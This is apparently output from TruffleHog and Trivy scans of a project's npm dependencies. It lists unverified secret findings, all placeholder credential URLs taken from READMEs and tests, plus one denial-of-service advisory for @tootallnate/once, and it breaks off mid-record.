13.333333333333332 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 4 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 71285c8155080cef ruleId: URI severity: MEDIUM tool: name: trufflehog version: unknown location: path: /scan/node_modules/faye-websocket/README.md startLine: 0 message: http://username:password@proxy.example.com title: URI secret description: Potential secret detected by TruffleHog remediation: Rotate credentials and purge from history. references: [] tags: - secrets - unverified risk: cwe: - CWE-798 confidence: MEDIUM likelihood: HIGH impact: HIGH raw: SourceMetadata: Data: Filesystem: file: /scan/node_modules/faye-websocket/README.md line: 122 SourceID: 1 SourceType: 15 SourceName: trufflehog - filesystem DetectorType: 17 DetectorName: URI DetectorDescription: This detector identifies URLs with embedded credentials, which can be used to access web resources without explicit user interaction. DecoderName: PLAIN Verified: false VerificationError: 'lookup proxy.example.com on 192.168.65.7:53: no such host' VerificationFromCache: false Raw: http://username:password@proxy.example.com RawV2: http://username:password@proxy.example.com Redacted: http://username:********@proxy.example.com ExtraData: null StructuredData: null compliance: owaspTop10_2021: - A02:2021 cweTop25_2024: - id: CWE-798 rank: 18 category: Credentials cisControlsV8_1: *id001 nistCsf2_0: - *id002 - *id003 pciDss4_0: - *id004 - *id005 mitreAttack: - *id006 - *id007 priority: priority: 13.333333333333332 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 4 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: cf9d5ac0f2fa1e76 ruleId: URI severity: MEDIUM tool: name: trufflehog version: unknown location: path: /scan/node_modules/firebase-admin/node_modules/@types/node/https.d.ts startLine: 0 message: https://abc:xyz@example.com title: URI secret description: Potential secret detected by TruffleHog remediation: Rotate credentials and purge from history. references: [] tags: - secrets - unverified risk: cwe: - CWE-798 confidence: MEDIUM likelihood: HIGH impact: HIGH raw: SourceMetadata: Data: Filesystem: file: /scan/node_modules/firebase-admin/node_modules/@types/node/https.d.ts line: 429 SourceID: 1 SourceType: 15 SourceName: trufflehog - filesystem DetectorType: 17 DetectorName: URI DetectorDescription: This detector identifies URLs with embedded credentials, which can be used to access web resources without explicit user interaction. DecoderName: PLAIN Verified: false VerificationFromCache: true Raw: https://abc:xyz@example.com RawV2: https://abc:xyz@example.com Redacted: https://abc:********@example.com ExtraData: null StructuredData: null compliance: owaspTop10_2021: - A02:2021 cweTop25_2024: - id: CWE-798 rank: 18 category: Credentials cisControlsV8_1: *id001 nistCsf2_0: - *id002 - *id003 pciDss4_0: - *id004 - *id005 mitreAttack: - *id006 - *id007 priority: priority: 13.333333333333332 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 4 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 40e557d25e059317 ruleId: URI severity: MEDIUM tool: name: trufflehog version: unknown location: path: /scan/node_modules/firebase-admin/node_modules/@types/node/http.d.ts startLine: 0 message: http://abc:xyz@example.com title: URI secret description: Potential secret detected by TruffleHog remediation: Rotate credentials and purge from history. references: [] tags: - secrets - unverified risk: cwe: - CWE-798 confidence: MEDIUM likelihood: HIGH impact: HIGH raw: SourceMetadata: Data: Filesystem: file: /scan/node_modules/firebase-admin/node_modules/@types/node/http.d.ts line: 1817 SourceID: 1 SourceType: 15 SourceName: trufflehog - filesystem DetectorType: 17 DetectorName: URI DetectorDescription: This detector identifies URLs with embedded credentials, which can be used to access web resources without explicit user interaction. DecoderName: PLAIN Verified: false VerificationFromCache: true Raw: http://abc:xyz@example.com RawV2: http://abc:xyz@example.com Redacted: http://abc:********@example.com ExtraData: null StructuredData: null compliance: owaspTop10_2021: - A02:2021 cweTop25_2024: - id: CWE-798 rank: 18 category: Credentials cisControlsV8_1: *id001 nistCsf2_0: - *id002 - *id003 pciDss4_0: - *id004 - *id005 mitreAttack: - *id006 - *id007 priority: priority: 13.333333333333332 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 4 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 919e333a335f73d4 ruleId: URI severity: MEDIUM tool: name: trufflehog version: unknown location: path: /scan/node_modules/firebase-admin/node_modules/@types/node/url.d.ts startLine: 0 message: https://abc:xyz@example.com title: URI secret description: Potential secret detected by TruffleHog remediation: Rotate credentials and purge from history. references: [] tags: - secrets - unverified risk: cwe: - CWE-798 confidence: MEDIUM likelihood: HIGH impact: HIGH raw: SourceMetadata: Data: Filesystem: file: /scan/node_modules/firebase-admin/node_modules/@types/node/url.d.ts line: 736 SourceID: 1 SourceType: 15 SourceName: trufflehog - filesystem DetectorType: 17 DetectorName: URI DetectorDescription: This detector identifies URLs with embedded credentials, which can be used to access web resources without explicit user interaction. DecoderName: ESCAPED_UNICODE Verified: false VerificationFromCache: true Raw: https://abc:xyz@example.com RawV2: https://abc:xyz@example.com Redacted: https://abc:********@example.com ExtraData: null StructuredData: null compliance: owaspTop10_2021: - A02:2021 cweTop25_2024: - id: CWE-798 rank: 18 category: Credentials cisControlsV8_1: *id001 nistCsf2_0: - *id002 - *id003 pciDss4_0: - *id004 - *id005 mitreAttack: - *id006 - *id007 priority: priority: 13.333333333333332 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 4 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: aa9f19a78a21fb70 ruleId: URI severity: MEDIUM tool: name: trufflehog version: unknown location: path: /scan/node_modules/firebase-admin/node_modules/@types/node/url.d.ts startLine: 0 message: https://123:xyz@example.com title: URI secret description: Potential secret detected by TruffleHog remediation: Rotate credentials and purge from history. references: [] tags: - secrets - unverified risk: cwe: - CWE-798 confidence: MEDIUM likelihood: HIGH impact: HIGH raw: SourceMetadata: Data: Filesystem: file: /scan/node_modules/firebase-admin/node_modules/@types/node/url.d.ts line: 742 SourceID: 1 SourceType: 15 SourceName: trufflehog - filesystem DetectorType: 17 DetectorName: URI DetectorDescription: This detector identifies URLs with embedded credentials, which can be used to access web resources without explicit user interaction. DecoderName: PLAIN Verified: false VerificationFromCache: true Raw: https://123:xyz@example.com RawV2: https://123:xyz@example.com Redacted: https://123:********@example.com ExtraData: null StructuredData: null compliance: owaspTop10_2021: - A02:2021 cweTop25_2024: - id: CWE-798 rank: 18 category: Credentials cisControlsV8_1: *id001 nistCsf2_0: - *id002 - *id003 pciDss4_0: - *id004 - *id005 mitreAttack: - *id006 - *id007 priority: priority: 13.333333333333332 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 4 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 6d8ae777484be698 ruleId: URI severity: MEDIUM tool: name: trufflehog version: unknown location: path: /scan/node_modules/firebase-admin/node_modules/@types/node/url.d.ts startLine: 0 message: https://abc:123@example.com title: URI secret description: Potential secret detected by TruffleHog remediation: Rotate credentials and purge from history. references: [] tags: - secrets - unverified risk: cwe: - CWE-798 confidence: MEDIUM likelihood: HIGH impact: HIGH raw: SourceMetadata: Data: Filesystem: file: /scan/node_modules/firebase-admin/node_modules/@types/node/url.d.ts line: 577 SourceID: 1 SourceType: 15 SourceName: trufflehog - filesystem DetectorType: 17 DetectorName: URI DetectorDescription: This detector identifies URLs with embedded credentials, which can be used to access web resources without explicit user interaction. DecoderName: PLAIN Verified: false VerificationFromCache: true Raw: https://abc:123@example.com RawV2: https://abc:123@example.com Redacted: https://abc:********@example.com ExtraData: null StructuredData: null compliance: owaspTop10_2021: - A02:2021 cweTop25_2024: - id: CWE-798 rank: 18 category: Credentials cisControlsV8_1: *id001 nistCsf2_0: - *id002 - *id003 pciDss4_0: - *id004 - *id005 mitreAttack: - *id006 - *id007 priority: priority: 13.333333333333332 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 4 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 170043ac8ee06ba6 ruleId: GCP severity: MEDIUM tool: name: trufflehog version: unknown location: path: /scan/node_modules/google-auth-library/README.md startLine: 0 message: your-client-email title: GCP secret description: Potential secret detected by TruffleHog remediation: Rotate credentials and purge from history. references: [] tags: - secrets - unverified risk: cwe: - CWE-798 confidence: MEDIUM likelihood: HIGH impact: HIGH raw: SourceMetadata: Data: Filesystem: file: /scan/node_modules/google-auth-library/README.md line: 323 SourceID: 1 SourceType: 15 SourceName: trufflehog - filesystem DetectorType: 6 DetectorName: GCP DetectorDescription: GCP (Google Cloud Platform) is a suite of cloud computing services that runs on the same infrastructure that Google uses internally for its end-user products. GCP keys can be used to access and manage these services. DecoderName: PLAIN Verified: false VerificationError: 'private key should be a PEM or plain PKCS1 or PKCS8; parse error: asn1: structure error: tags don''t match (16 vs {class:1 tag:25 length:111 isCompound:true}) {optional:false explicit:false application:false private:false defaultValue: tag: stringType:0 timeType:0 set:false omitEmpty:false} pkcs1PrivateKey @2' VerificationFromCache: false Raw: your-client-email RawV2: '{"type":"service_account","project_id":"your-project-id","private_key_id":"your-private-key-id","private_key":"your-private-key","client_email":"your-client-email","client_id":"your-client-id","auth_uri":"https://accounts.google.com/o/oauth2/auth","token_uri":"https://accounts.google.com/o/oauth2/token","auth_provider_x509_cert_url":"https://www.googleapis.com/oauth2/v1/certs","client_x509_cert_url":"your-cert-url"}' Redacted: your-client-email ExtraData: private_key_id: your-private-key-id project: your-project-id rotation_guide: https://howtorotate.com/docs/tutorials/gcp/ StructuredData: null compliance: owaspTop10_2021: - A02:2021 cweTop25_2024: - id: CWE-798 rank: 18 category: Credentials cisControlsV8_1: *id001 nistCsf2_0: - *id002 - *id003 pciDss4_0: - *id004 - *id005 mitreAttack: - *id006 - *id007 priority: priority: 13.333333333333332 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 4 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: d5d31157dd10c1ff ruleId: Circle severity: MEDIUM tool: name: trufflehog version: unknown location: path: /scan/node_modules/ip-address/README.md startLine: 0 message: 7baede7efd3db5f1f25fb439e97d5f695ff76318 title: Circle secret description: Potential secret detected by TruffleHog remediation: Rotate credentials and purge from history. references: [] tags: - secrets - unverified risk: cwe: - CWE-798 confidence: MEDIUM likelihood: HIGH impact: HIGH raw: SourceMetadata: Data: Filesystem: file: /scan/node_modules/ip-address/README.md line: 1 SourceID: 1 SourceType: 15 SourceName: trufflehog - filesystem DetectorType: 4 DetectorName: Circle DetectorDescription: CircleCI is a continuous integration and delivery platform used to build, test, and deploy software. CircleCI tokens can be used to interact with the CircleCI API and access various resources and functionalities. DecoderName: PLAIN Verified: false VerificationFromCache: false Raw: 7baede7efd3db5f1f25fb439e97d5f695ff76318 RawV2: '' Redacted: '' ExtraData: Version: '1' StructuredData: null compliance: owaspTop10_2021: - A02:2021 cweTop25_2024: - id: CWE-798 rank: 18 category: Credentials cisControlsV8_1: *id001 nistCsf2_0: - *id002 - *id003 pciDss4_0: - *id004 - *id005 mitreAttack: - *id006 - *id007 priority: priority: 13.333333333333332 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 4 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 7196c7e679641da3 ruleId: MongoDB severity: MEDIUM tool: name: trufflehog version: unknown location: path: /scan/node_modules/prisma/build/index.js startLine: 0 message: mongodb+srv://root:randompassword@cluster0.ab1cd.mongodb.net/mydb?retryWrites=true&w=majority title: MongoDB secret description: Potential secret detected by TruffleHog remediation: Rotate credentials and purge from history. references: [] tags: - secrets - unverified risk: cwe: - CWE-798 confidence: MEDIUM likelihood: HIGH impact: HIGH raw: SourceMetadata: Data: Filesystem: file: /scan/node_modules/prisma/build/index.js line: 1568 SourceID: 1 SourceType: 15 SourceName: trufflehog - filesystem DetectorType: 895 DetectorName: MongoDB DetectorDescription: MongoDB is a NoSQL database that uses a document-oriented data model. MongoDB credentials can be used to access and manipulate the database. DecoderName: PLAIN Verified: false VerificationError: 'lookup _mongodb._tcp.cluster0.ab1cd.mongodb.net on 192.168.65.7:53: no such host' VerificationFromCache: false Raw: mongodb+srv://root:randompassword@cluster0.ab1cd.mongodb.net/mydb?retryWrites=true&w=majority RawV2: '' Redacted: '' ExtraData: rotation_guide: https://howtorotate.com/docs/tutorials/mongo/ StructuredData: null compliance: owaspTop10_2021: - A02:2021 cweTop25_2024: - id: CWE-798 rank: 18 category: Credentials cisControlsV8_1: *id001 nistCsf2_0: - *id002 - *id003 pciDss4_0: - *id004 - *id005 mitreAttack: - *id006 - *id007 priority: priority: 13.333333333333332 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 4 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: f4471d3670e3b099 ruleId: MongoDB severity: MEDIUM tool: name: trufflehog version: unknown location: path: /scan/node_modules/keyv/README.md startLine: 0 message: mongodb://user:pass@localhost:27017/dbname title: MongoDB secret description: Potential secret detected by TruffleHog remediation: Rotate credentials and purge from history. references: [] tags: - secrets - unverified risk: cwe: - CWE-798 confidence: MEDIUM likelihood: HIGH impact: HIGH raw: SourceMetadata: Data: Filesystem: file: /scan/node_modules/keyv/README.md line: 58 SourceID: 1 SourceType: 15 SourceName: trufflehog - filesystem DetectorType: 895 DetectorName: MongoDB DetectorDescription: MongoDB is a NoSQL database that uses a document-oriented data model. MongoDB credentials can be used to access and manipulate the database. DecoderName: PLAIN Verified: false VerificationError: context deadline exceeded VerificationFromCache: false Raw: mongodb://user:pass@localhost:27017/dbname RawV2: '' Redacted: '' ExtraData: rotation_guide: https://howtorotate.com/docs/tutorials/mongo/ StructuredData: null compliance: owaspTop10_2021: - A02:2021 cweTop25_2024: - id: CWE-798 rank: 18 category: Credentials cisControlsV8_1: *id001 nistCsf2_0: - *id002 - *id003 pciDss4_0: - *id004 - *id005 mitreAttack: - *id006 - *id007 priority: priority: 13.333333333333332 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 4 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: d837ea8fcf1f8062 ruleId: URI severity: MEDIUM tool: name: trufflehog version: unknown location: path: /scan/node_modules/websocket-driver/README.md startLine: 0 message: http://username:password@proxy.example.com title: URI secret description: Potential secret detected by TruffleHog remediation: Rotate credentials and purge from history. references: [] tags: - secrets - unverified risk: cwe: - CWE-798 confidence: MEDIUM likelihood: HIGH impact: HIGH raw: SourceMetadata: Data: Filesystem: file: /scan/node_modules/websocket-driver/README.md line: 177 SourceID: 1 SourceType: 15 SourceName: trufflehog - filesystem DetectorType: 17 DetectorName: URI DetectorDescription: This detector identifies URLs with embedded credentials, which can be used to access web resources without explicit user interaction. DecoderName: PLAIN Verified: false VerificationError: 'lookup proxy.example.com on 192.168.65.7:53: no such host' VerificationFromCache: true Raw: http://username:password@proxy.example.com RawV2: http://username:password@proxy.example.com Redacted: http://username:********@proxy.example.com ExtraData: null StructuredData: null compliance: owaspTop10_2021: - A02:2021 cweTop25_2024: - id: CWE-798 rank: 18 category: Credentials cisControlsV8_1: *id001 nistCsf2_0: - *id002 - *id003 pciDss4_0: - *id004 - *id005 mitreAttack: - *id006 - *id007 priority: priority: 13.333333333333332 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 4 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 0a6439395ad23821 ruleId: URI severity: MEDIUM tool: name: trufflehog version: unknown location: path: /scan/node_modules/zod/src/v4/classic/tests/string.test.ts startLine: 0 message: https://anonymous:flabada@developer.mozilla.org title: URI secret description: Potential secret detected by TruffleHog remediation: Rotate credentials and purge from history. references: [] tags: - secrets - unverified risk: cwe: - CWE-798 confidence: MEDIUM likelihood: HIGH impact: HIGH raw: SourceMetadata: Data: Filesystem: file: /scan/node_modules/zod/src/v4/classic/tests/string.test.ts line: 307 SourceID: 1 SourceType: 15 SourceName: trufflehog - filesystem DetectorType: 17 DetectorName: URI DetectorDescription: This detector identifies URLs with embedded credentials, which can be used to access web resources without explicit user interaction. DecoderName: PLAIN Verified: false VerificationFromCache: false Raw: https://anonymous:flabada@developer.mozilla.org RawV2: https://anonymous:flabada@developer.mozilla.org/en Redacted: https://anonymous:********@developer.mozilla.org/en ExtraData: null StructuredData: null compliance: owaspTop10_2021: - A02:2021 cweTop25_2024: - id: CWE-798 rank: 18 category: Credentials cisControlsV8_1: *id001 nistCsf2_0: - *id002 - *id003 pciDss4_0: - *id004 - *id005 mitreAttack: - *id006 - *id007 priority: priority: 13.333333333333332 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 4 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 1dff4f66e83b2b09 ruleId: Postgres severity: MEDIUM tool: name: trufflehog version: unknown location: path: /scan/node_modules/is-url/test/index.js startLine: 0 message: postgres://u:p@example.com:5702 title: Postgres secret description: Potential secret detected by TruffleHog remediation: Rotate credentials and purge from history. references: [] tags: - secrets - unverified risk: cwe: - CWE-798 confidence: MEDIUM likelihood: HIGH impact: HIGH raw: SourceMetadata: Data: Filesystem: file: /scan/node_modules/is-url/test/index.js line: 68 SourceID: 1 SourceType: 15 SourceName: trufflehog - filesystem DetectorType: 968 DetectorName: Postgres DetectorDescription: Postgres connection string containing credentials DecoderName: PLAIN Verified: false VerificationError: i/o timeout VerificationFromCache: false Raw: postgres://u:p@example.com:5702 RawV2: postgres://u:p@example.com:5702 Redacted: '' ExtraData: sslmode: StructuredData: null compliance: owaspTop10_2021: - A02:2021 cweTop25_2024: - id: CWE-798 rank: 18 category: Credentials cisControlsV8_1: *id001 nistCsf2_0: - *id002 - *id003 pciDss4_0: - *id004 - *id005 mitreAttack: - *id006 - *id007 priority: priority: 13.333333333333332 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 4 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 849f8848e4b2049c ruleId: GitHubOauth2 severity: MEDIUM tool: name: trufflehog version: unknown location: path: /scan/node_modules/qrcode/node_modules/yargs/CHANGELOG.md startLine: 0 message: showCompletionScript title: GitHubOauth2 secret description: Potential secret detected by TruffleHog remediation: Rotate credentials and purge from history. references: [] tags: - secrets - unverified risk: cwe: - CWE-798 confidence: MEDIUM likelihood: HIGH impact: HIGH raw: SourceMetadata: Data: Filesystem: file: /scan/node_modules/qrcode/node_modules/yargs/CHANGELOG.md line: 164 SourceID: 1 SourceType: 15 SourceName: trufflehog - filesystem DetectorType: 924 DetectorName: GitHubOauth2 DetectorDescription: GitHub OAuth2 credentials are used to authenticate and authorize applications to access GitHub's API on behalf of a user or organization. These credentials include a client ID and client secret, which can be used to obtain access tokens for accessing GitHub resources. DecoderName: PLAIN Verified: false VerificationFromCache: false Raw: showCompletionScript RawV2: showCompletionScript027a6365b737e13116811a8ef43670196e1fa00a Redacted: '' ExtraData: rotation_guide: https://howtorotate.com/docs/tutorials/github/ StructuredData: null compliance: owaspTop10_2021: - A02:2021 cweTop25_2024: - id: CWE-798 rank: 18 category: Credentials cisControlsV8_1: *id001 nistCsf2_0: - *id002 - *id003 pciDss4_0: - *id004 - *id005 mitreAttack: - *id006 - *id007 priority: priority: 13.333333333333332 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 4 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 9afc5113c741a56f ruleId: MongoDB severity: MEDIUM tool: name: trufflehog version: unknown location: path: /scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts startLine: 0 message: mongodb://username:password@host:1234 title: MongoDB secret description: Potential secret detected by TruffleHog remediation: Rotate credentials and purge from history. references: [] tags: - secrets - unverified risk: cwe: - CWE-798 confidence: MEDIUM likelihood: HIGH impact: HIGH raw: SourceMetadata: Data: Filesystem: file: /scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts line: 644 SourceID: 1 SourceType: 15 SourceName: trufflehog - filesystem DetectorType: 895 DetectorName: MongoDB DetectorDescription: MongoDB is a NoSQL database that uses a document-oriented data model. MongoDB credentials can be used to access and manipulate the database. DecoderName: PLAIN Verified: false VerificationError: context deadline exceeded VerificationFromCache: false Raw: mongodb://username:password@host:1234 RawV2: '' Redacted: '' ExtraData: rotation_guide: https://howtorotate.com/docs/tutorials/mongo/ StructuredData: null compliance: owaspTop10_2021: - A02:2021 cweTop25_2024: - id: CWE-798 rank: 18 category: Credentials cisControlsV8_1: *id001 nistCsf2_0: - *id002 - *id003 pciDss4_0: - *id004 - *id005 mitreAttack: - *id006 - *id007 priority: priority: 13.333333333333332 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 4 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 917b9a33e85655cd ruleId: MongoDB severity: MEDIUM tool: name: trufflehog version: unknown location: path: /scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts startLine: 0 message: mongodb://username:password@host:1234/defaultauthdb title: MongoDB secret description: Potential secret detected by TruffleHog remediation: Rotate credentials and purge from history. references: [] tags: - secrets - unverified risk: cwe: - CWE-798 confidence: MEDIUM likelihood: HIGH impact: HIGH raw: SourceMetadata: Data: Filesystem: file: /scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts line: 646 SourceID: 1 SourceType: 15 SourceName: trufflehog - filesystem DetectorType: 895 DetectorName: MongoDB DetectorDescription: MongoDB is a NoSQL database that uses a document-oriented data model. MongoDB credentials can be used to access and manipulate the database. DecoderName: PLAIN Verified: false VerificationError: context deadline exceeded VerificationFromCache: false Raw: mongodb://username:password@host:1234/defaultauthdb RawV2: '' Redacted: '' ExtraData: rotation_guide: https://howtorotate.com/docs/tutorials/mongo/ StructuredData: null compliance: owaspTop10_2021: - A02:2021 cweTop25_2024: - id: CWE-798 rank: 18 category: Credentials cisControlsV8_1: *id001 nistCsf2_0: - *id002 - *id003 pciDss4_0: - *id004 - *id005 mitreAttack: - *id006 - *id007 priority: priority: 13.333333333333332 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 4 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 31f0bf34095c5b38 ruleId: MongoDB severity: MEDIUM tool: name: trufflehog version: unknown location: path: /scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts startLine: 0 message: mongodb://username:password@host:1234/defaultauthdb?authSource=admin title: MongoDB secret description: Potential secret detected by TruffleHog remediation: Rotate credentials and purge from history. references: [] tags: - secrets - unverified risk: cwe: - CWE-798 confidence: MEDIUM likelihood: HIGH impact: HIGH raw: SourceMetadata: Data: Filesystem: file: /scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts line: 647 SourceID: 1 SourceType: 15 SourceName: trufflehog - filesystem DetectorType: 895 DetectorName: MongoDB DetectorDescription: MongoDB is a NoSQL database that uses a document-oriented data model. MongoDB credentials can be used to access and manipulate the database. DecoderName: PLAIN Verified: false VerificationError: context deadline exceeded VerificationFromCache: false Raw: mongodb://username:password@host:1234/defaultauthdb?authSource=admin RawV2: '' Redacted: '' ExtraData: rotation_guide: https://howtorotate.com/docs/tutorials/mongo/ StructuredData: null compliance: owaspTop10_2021: - A02:2021 cweTop25_2024: - id: CWE-798 rank: 18 category: Credentials cisControlsV8_1: *id001 nistCsf2_0: - *id002 - *id003 pciDss4_0: - *id004 - *id005 mitreAttack: - *id006 - *id007 priority: priority: 13.333333333333332 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 4 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 1dda63967d05f07b ruleId: MongoDB severity: MEDIUM tool: name: trufflehog version: unknown location: path: /scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts startLine: 0 message: mongodb://username:password@host:1234/defaultauthdb?authSource=admin&connectTimeoutMS=300000 title: MongoDB secret description: Potential secret detected by TruffleHog remediation: Rotate credentials and purge from history. references: [] tags: - secrets - unverified risk: cwe: - CWE-798 confidence: MEDIUM likelihood: HIGH impact: HIGH raw: SourceMetadata: Data: Filesystem: file: /scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts line: 649 SourceID: 1 SourceType: 15 SourceName: trufflehog - filesystem DetectorType: 895 DetectorName: MongoDB DetectorDescription: MongoDB is a NoSQL database that uses a document-oriented data model. MongoDB credentials can be used to access and manipulate the database. DecoderName: PLAIN Verified: false VerificationError: context deadline exceeded VerificationFromCache: false Raw: mongodb://username:password@host:1234/defaultauthdb?authSource=admin&connectTimeoutMS=300000 RawV2: '' Redacted: '' ExtraData: rotation_guide: https://howtorotate.com/docs/tutorials/mongo/ StructuredData: null compliance: owaspTop10_2021: - A02:2021 cweTop25_2024: - id: CWE-798 rank: 18 category: Credentials cisControlsV8_1: *id001 nistCsf2_0: - *id002 - *id003 pciDss4_0: - *id004 - *id005 mitreAttack: - *id006 - *id007 priority: priority: 13.333333333333332 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 4 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 9491b5fd54f57cb2 ruleId: MongoDB severity: MEDIUM tool: name: trufflehog version: unknown location: path: /scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts startLine: 0 message: mongodb://username:password@host:1234/?authSource=admin title: MongoDB secret description: Potential secret detected by TruffleHog remediation: Rotate credentials and purge from history. references: [] tags: - secrets - unverified risk: cwe: - CWE-798 confidence: MEDIUM likelihood: HIGH impact: HIGH raw: SourceMetadata: Data: Filesystem: file: /scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts line: 651 SourceID: 1 SourceType: 15 SourceName: trufflehog - filesystem DetectorType: 895 DetectorName: MongoDB DetectorDescription: MongoDB is a NoSQL database that uses a document-oriented data model. MongoDB credentials can be used to access and manipulate the database. DecoderName: PLAIN Verified: false VerificationError: context deadline exceeded VerificationFromCache: false Raw: mongodb://username:password@host:1234/?authSource=admin RawV2: '' Redacted: '' ExtraData: rotation_guide: https://howtorotate.com/docs/tutorials/mongo/ StructuredData: null compliance: owaspTop10_2021: - A02:2021 cweTop25_2024: - id: CWE-798 rank: 18 category: Credentials cisControlsV8_1: *id001 nistCsf2_0: - *id002 - *id003 pciDss4_0: - *id004 - *id005 mitreAttack: - *id006 - *id007 priority: priority: 13.333333333333332 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 4 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: f911dc46b3477b87 ruleId: MongoDB severity: MEDIUM tool: name: trufflehog version: unknown location: path: /scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts startLine: 0 message: mongodb://username:password@host:1234/?authSource=admin&connectTimeoutMS=300000 title: MongoDB secret description: Potential secret detected by TruffleHog remediation: Rotate credentials and purge from history. references: [] tags: - secrets - unverified risk: cwe: - CWE-798 confidence: MEDIUM likelihood: HIGH impact: HIGH raw: SourceMetadata: Data: Filesystem: file: /scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts line: 652 SourceID: 1 SourceType: 15 SourceName: trufflehog - filesystem DetectorType: 895 DetectorName: MongoDB DetectorDescription: MongoDB is a NoSQL database that uses a document-oriented data model. MongoDB credentials can be used to access and manipulate the database. DecoderName: PLAIN Verified: false VerificationError: context deadline exceeded VerificationFromCache: false Raw: mongodb://username:password@host:1234/?authSource=admin&connectTimeoutMS=300000 RawV2: '' Redacted: '' ExtraData: rotation_guide: https://howtorotate.com/docs/tutorials/mongo/ StructuredData: null compliance: owaspTop10_2021: - A02:2021 cweTop25_2024: - id: CWE-798 rank: 18 category: Credentials cisControlsV8_1: *id001 nistCsf2_0: - *id002 - *id003 pciDss4_0: - *id004 - *id005 mitreAttack: - *id006 - *id007 priority: priority: 13.333333333333332 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 4 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 7e52e475110f77c7 ruleId: CVE-2026-3449 severity: LOW tool: name: trivy version: unknown location: path: package-lock.json startLine: 0 message: '@tootallnate/once: @tootallnate/once: Denial of Service due to incorrect control flow scoping with AbortSignal' title: CVE-2026-3449 description: Versions of the package @tootallnate/once before 3.0.1 are vulnerable to Incorrect Control Flow Scoping in promise resolving when AbortSignal option is used. The Promise remains in a permanently pending state after the signal is aborted, causing any await or .then() usage to hang indefinitely. This can cause a control-flow leak that can lead to stalled requests, blocked workers, or degraded application availability. remediation: https://avd.aquasec.com/nvd/cve-2026-3449 references: [] tags: - vulnerability - pkg:@tootallnate/once@2.0.0 risk: cwe: &id008 - CWE-705 raw: VulnerabilityID: CVE-2026-3449 VendorIDs: - GHSA-vpq2-c234-7xj6 PkgID: '@tootallnate/once@2.0.0' PkgName: '@tootallnate/once' PkgIdentifier: PURL: pkg:npm/%40tootallnate/once@2.0.0 UID: 22f57853d23edc3a InstalledVersion: 2.0.0 FixedVersion: 3.0.1 Status: fixed SeveritySource: ghsa PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-3449 DataSource: ID: ghsa Name: GitHub Security Advisory npm URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm Fingerprint: 